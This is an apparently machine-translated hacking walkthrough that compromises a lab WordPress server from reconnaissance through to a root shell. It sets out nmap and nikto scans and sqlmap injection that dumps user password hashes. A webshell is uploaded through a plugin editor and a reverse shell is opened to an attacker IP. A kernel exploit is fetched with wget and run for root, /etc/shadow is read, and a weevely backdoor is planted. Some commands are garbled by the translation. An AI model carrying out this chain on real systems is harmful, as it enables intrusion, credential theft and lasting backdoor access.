How hackers have hacked into your site

The question is difficult to answer, in simple terms ,, there are many ways to invade a website. The purpose of this article is to demonstrate the techniques that hackers commonly use to scan and invade websites.
Suppose your site is: hack-test.com

Let's ping this server:

We got an IP address: 173.236.138.113– This is the IP address of our destination server.
Sameip.org can help us find other domains that are bound to this server:

Same IP
Sites hosted on IP Address 173.236.138.113
There are 26 sites on this server (173.236.138.113). Many hackers will choose to attack different sites on the same server to invade your site. But for the purposes of learning, we only choose to invade your server.
We need to get a message from your site:
1.DNS Records (A,NS,TXT,MX and SOA)
2. Type of Web server (APACHE,IIS,TOMCAT)
3. Domain name registration information (which company owns this domain name)
4. Your name, address, email and phone number
5. The type of script that is running on your website (php,asp,asp.net,jsp,cfm)
6. Type of operating system for the server (Unix,linux,windows,solaris)
7. Server Open Ports (80,443,21, etc.) now let's look for the DNS records for the site. Select Site "who.is" to achieve this goal.

We found that the DNS records on the site were:


Let's check the type of Web server:

We can see that the website server is using Apache. We'll check the Apache version later.
hack-test.com SITE Information
ip:173.236.138.113
Website status:active
Server Type:apache
Alexa trend/rank:1 month:3,213,968 3 month:2,161,753
Page views per visit:1 month:2.0 3 month:3.7 Next we look for the domain name registration information:

We have registered people and other important information. We can use Whatweb to detect what scripting language your site is using, as well as the type of operating system and the version of the Web server.





We can see that the website is using WordPress, the operating system type is Fedora Linux, the website server version is Apache 2.2.15, let us check the server on the open port:
We use Nmap:
1. detect which services are running on the server:
[Email protected]:/# nmap-sv hack-test.com

Starting Nmap 5.59beta1 (http://nmap.org) at 2011-12-28 06:39
Nmap Scan Report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown:998 filtered ports
PORT State SERVICE VERSION
22/TCP closed SSH
80/TCP Open http Apache httpd 2.2.15 (Fedora)
MAC address:00:0c:29:01:8a:4d (VMware)

Service Detection performed. Incorrect results at http://nmap.org/submit/.

Nmap done:1 IP Address (1 host up) scanned in 11.56 seconds 2. Detection of server OS
[Email protected]:/# nmap-o hack-test.com

Starting Nmap 5.59beta1 (http://nmap.org) at 2011-12-28 06:40
Nmap Scan Report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown:998 filtered ports
PORT State SERVICE
22/TCP closed SSH

80/TCP Open http
MAC address:00:0c:29:01:8a:4d (VMware)
Device type:general Purpose
Running:linux 2.6.X
OS details:linux 2.6.22 (Fedora Core 6)
Network distance:1 Hop

OS Detection performed. Incorrect results at http://nmap.org/submit/.

Nmap done:1 IP Address (1 host up) scanned in 7.42 seconds server only open 80 ports, operating system is Linux 2.6.22 (Fedora Core 6)
Now that we've got all the important information, let's do a bit of vulnerability testing, such as SQL injection, blinds, LFI,RFI,XSS,CSRF, etc.
We use nikto.pl to get information and weaknesses:
[Email protected]:/pentest/web/nikto# perl nikto.pl-h http://hack-test.com

-Nikto v2.1.4

---------------------------------------------------------------------------

+ Target ip:192.168.1.2
+ Target hostname:hack-test.com
+ Target port:80
+ Start time:2011-12-29 06:50:03

---------------------------------------------------------------------------

+ server:apache/2.2.15 (Fedora)
+ ETag header found on server, inode:12748, size:1475, mtime:0x4996d177f5c3b
+ apache/2.2.15 appears to being outdated (current was at least apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 is also current.
+ Allowed HTTP methods:get, HEAD, POST, OPTIONS, TRACE
+ Osvdb-877:http TRACE method is active, suggesting the host was vulnerable to XST
+ OSVDB-3268:/icons/: Directory indexing found.
+ OSVDB-3233:/icons/readme:apache default file found.
+ 6448 Items checked:1 error (s) and 6 item (s) reported on remote host
+ End time:2011-12-29 06:50:37 (seconds)

---------------------------------------------------------------------------

+ 1 Host (s) tested


You can also use W3AF, a tool that can be found in Backtrack 5 R1
[Email protected]:/pentest/web/w3af#./w3af_gui

Starting W3AF, running on:
Python version:
2.6.5 (r265:79063, APR 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version:2.20.1
PyGTK version:2.17.0

W3af-web application Attack and Audit Framework
version:1.2
revision:4605
Author:andres Riancho and the W3AF team.
We can insert the URL and select the full audit option:

Wait a moment and the results will appear.

There are SQL injection vulnerabilities and other vulnerabilities in the Web site.
Let's go deep into SQL injection:

http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220 This address is the injection point,

We'll use Sqlmap and dump all the database information needed for the intrusion.
sqlmap–u URL


Wait for a moment:

Select "N" to continue:

The SQL injection type of the site is the version of the error-based MySQL database is 5.
Add the parameter "-dbs" to find all the databases:

We have found 3 databases:

Exporting WordPress database tables with Dump–dwordpress-tables






We need to export the "wp_users" table to get user information and password hash, then we can try to crack the password finally landed in WordPress backstage.
Using Parameters "-t Wp_users–columns"




22 columns of data were found:

Use the parameter-C user_login,user_pass–dump to export the column.
Then we get the account password.

Then use this website to convert MD5 to plaintext (not all hashes can be converted successfully)
"Http://www.onlinehashcrack.com/free-hash-reverse.php"

The plaintext password is: q1w2e3
Username "Georgemiller" let's log in to WordPress backstage:

Now let's try uploading a PHP Webshell to execute some Linux commands on this server.
Edit WordPress "Textile" Plugin
Edit it


Insert a PHP Webshell instead of a real plugin. Then click Upload, PHP Webshell is successfully uploaded to the server.



Now, PHP Webshell is running successfully. Now you can browse all the files on the site, but we want the root of the server and then invade other sites.
Select "Back-connect" in PHP Webshell and connect to our IP "192.168.1.6″ port" 5555″

Before we click on the connection, we must first listen to a "5555" port on this machine.

Click Connect and we'll get a window like this:

Let's try the Linux command.
Id
uid=48 (Apache) gid=489 (Apache) groups=489 (Apache)
Pwd
/var/www/html/hackademic_rtb1/wp-content/plugins
Uname-a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat 7 21:41:45 EST i686 i686 i386 gnu/linux
The ID command is used to tell us the user ID and user group
The PWD command can tell us where we are now.
The Uname–a command is used to get some information and kernel version
Well, we now know that the kernel version of the server is 2.6.31.5-127.fc12.1686
Ok, now we knew this server kernel version is 2.6.31.5-127.fc12.1686
We can find the exploit for this version in exploit-db.com.
Enter: " kernel 2.6.31“

The above results are not appropriate because they are not used for power. Next, that's it!

http://www.exploit-db.com/exploits/15285
Copy this connection
http://www.exploit-db.com/download/15285
In the Netcat shell, enter:
wget Http://www.exploit-db.com/download/15285-O roro.c--2011-12-28 00:48:01--http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com ... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80 ... Connected.
HTTP request sent, awaiting response ... 301 Moved Permanently
location:http://www.exploit-db.com/download/15285/[following]
--2011-12-28 00:48:02--http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80 ... Connected.
HTTP request sent, awaiting response ... OK
length:7154 (7.0K) [Application/txt]
Saving to: ' RORO.C '

0K ... 100% 29.7k=0.2s
We use the wget command to get exploit-db.com Exploit,-o is to rename the file as: roro.c
Note:
Linux kernel exploits most are developed in C language, so we save the suffix named. C, directly browse the source file can be directly see source code:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>

#define Recvport 5555
#define SendPort 6666

Intprep_sock (Intport)
{

INTs, ret;
Structsockaddr_in addr;

s = socket (pf_rds, sock_seqpacket, 0);

if (s < 0) {
printf ("[*] Could not open socket.\n");
Exit (-1);
}
Www.2cto.com
memset (&addr, 0, sizeof (addr));

All the above lines indicate it is exploit are written in C language
After we saved us exploit on server, we'll compile it to elf format by typing we save exploit on the server, we can compile it:
GCC Roro.c–o RoRo
Then execute the exploit:
./roro

[*] Linux kernel >= 2.6.30 RDS socket Exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses ...
[+] Resolved Rds_proto_ops to 0xe09f0b20
[+] Resolved Rds_ioctl to 0xe09db06a
[+] Resolved Commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] overwriting function pointer ...
[*] Linux kernel >= 2.6.30 RDS socket Exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses ...
[+] Resolved Rds_proto_ops to 0xe09f0b20
[+] Resolved Rds_ioctl to 0xe09db06a
[+] Resolved Commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] overwriting function pointer ...
[*] Triggering payload ...
[*] Restoring function pointer ... Id
At this time we are already root authority.
Uid=0 (Root) gid=0 (root)



We can browse/etc/shadow file
Cat/etc/shadow

root:$6$4l1ovmlpsv28evct$fqycc5mozz8mqiqgfudlshuk7r1emu/ Fxw3pocob39lxekt9vy6hygkxcleo.ab9f9t7bqtdxsjvccy.iylcp0:14981:0:99999:7:::
Bin:*:14495:0:99999:7:::
Daemon:*:14495:0:99999:7:::
Adm:*:14495:0:99999:7:::
Lp:*:14495:0:99999:7:::
Sync:*:14495:0:99999:7:::
Shutdown:*:14495:0:99999:7:::
Halt:*:14495:0:99999:7:::
Mail:*:14495:0:99999:7:::
Uucp:*:14495:0:99999:7:::
Operator:*:14495:0:99999:7:::
Games:*:14495:0:99999:7:::
Gopher:*:14495:0:99999:7:::
Ftp:*:14495:0:99999:7:::
Nobody:*:14495:0:99999:7:::
vcsa:!! : 14557::::::
avahi-autoipd:!! : 14557::::::
Ntp:!! : 14557::::::
dbus:!! : 14557::::::
rtkit:!! : 14557::::::
nscd:!! : 14557::::::
tcpdump:!! : 14557::::::
avahi:!! : 14557::::::
haldaemon:!! : 14557::::::
openvpn:!! : 14557::::::
Apache:!! : 14557::::::
saslauth:!! : 14557::::::
mailnull:!! : 14557::::::
smmsp:!! : 14557::::::
smolt:!! : 14557::::::
Sshd:!! : 14557::::::
pulse:!! : 14557::::::
Gdm:!! : 14557::::::
P0wnbox. Team:$6$rparluwe8rm9avwv$a5cooducqqy7ngvtnxafj2d5smggrrfsr6tp8g7iatveet37lugjyvhm1myhelcypkijd8yv5olmnuhwbql76 /:14981:0:99999:7:::
Mysql:!! : 14981:::::: Browse/etc/passwd file
cat/etc/passwd

Root:x:0:0:root:/root:/bin/bash
Bin:x:1:1:bin:/bin:/sbin/nologin
Daemon:x:2:2:daemon:/sbin:/sbin/nologin
Adm:x:3:4:adm:/var/adm:/sbin/nologin
Lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
Sync:x:5:0:sync:/sbin:/bin/sync
Shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
Halt:x:7:0:halt:/sbin:/sbin/halt
Mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
Uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
Operator:x:11:0:operator:/root:/sbin/nologin
Games:x:12:100:games:/usr/games:/sbin/nologin
Gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
Ftp:x:14:50:ftp User:/var/ftp:/sbin/nologin
Nobody:x:99:99:nobody:/:/sbin/nologin
Vcsa:x:69:499:virtual Console Memory Owner:/dev:/sbin/nologin
Avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologin
Dbus:x:81:81:system message Bus:/:/sbin/nologin
Rtkit:x:498:494:realtimekit:/proc:/sbin/nologin
NSCD:X:28:493:NSCD Daemon:/:/sbin/nologin
Tcpdump:x:72:72::/:/sbin/nologin
Avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
Haldaemon:x:68:491:hal Daemon:/:/sbin/nologin
Openvpn:x:496:490:openvpn:/etc/openvpn:/sbin/nologin
Apache:x:48:489:apache:/var/www:/sbin/nologin
saslauth:x:495:488: "SASLAUTHD user":/var/empty/saslauth:/sbin/nologin
Mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
Smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
Smolt:x:494:485:smolt:/usr/share/smolt:/sbin/nologin
sshd:x:74:484:privilege-separated Ssh:/var/empty/sshd:/sbin/nologinpulse:x:493:483:pulseaudio System Daemon:/var/ Run/pulse:/sbin/nologin
Gdm:x:42:481::/var/lib/gdm:/sbin/nologin
P0wnbox. Team:x:500:500:p0wnbox. Team:/home/p0wnbox. Team:/bin/bash
Mysql:x:27:480:mysql Server:/var/lib/mysql:/bin/bash We can use "John the Ripper" to hack the user's password, but we won't do it.
Hackers need to leave a backdoor on the server for easy access later.
Here, we use weevely to generate a small, password-coded PHP backdoor, which is then uploaded to the server to achieve the goal.
weevely usage :
[Email protected]:/pentest/backdoors/web/weevely#./main.py-

Weevely 0.3-generate and manage Stealth PHP backdoors.
Copyright (c) 2011-2012 weevely developers
website:http://code.google.com/p/weevely/
Usage:main.py [Options]

Options:
-H,--help show this help message and exit
-G,--generate generate backdoor crypted code, Requires-o and-p.
-O OUTPUT,--output=output
Output filename for generated backdoor.
-C COMMAND,--command=command
Execute a single command and exit, Requires-u And-p
.
-T,--terminal Start a terminal-like session, Requires-u And-p.
-C CLUSTER,--cluster=clusterstart in CLUSTER mode reading items from the Give
File, in the form ' Label,url,password ' where label is
Optional.
-P PASSWORD,--password=password
Password of the encrypted backdoor.

-u URL,--url=url Remote backdoor URL. Create a password- PHP Back Door
[Email protected]:/pentest/backdoors/web/weevely#./MAIN.PY-G-O hax.php-p koko

Weevely 0.3-generate and manage Stealth PHP backdoors.
Copyright (c) 2011-2012 weevely developers
website:http://code.google.com/p/weevely/

+ Backdoor file ' hax.php ' created with password ' Koko '.
Upload a php backdoor via PHP Webshell


Once the upload is complete, we use the command to connect:
[Email protected]:/pentest/backdoors/web/weevely#./main.py-t-U http://hack-test.com/Hackademic_RTB1/wp-content/ Plugins/hax.php-p Koko

Weevely 0.3-generate and manage Stealth PHP backdoors. Copyright (c) 2011-2012 weevely developers
website:http://code.google.com/p/weevely/

+ Using method ' System () '.
+ Retrieving terminal basic environment variables.

[[email protected]/var/www/html/hackademic_rtb1/wp-content/plugins]
Test our hax.php back door.



[via Infosecinstitute translation PPSBB]

How hackers have hacked into your site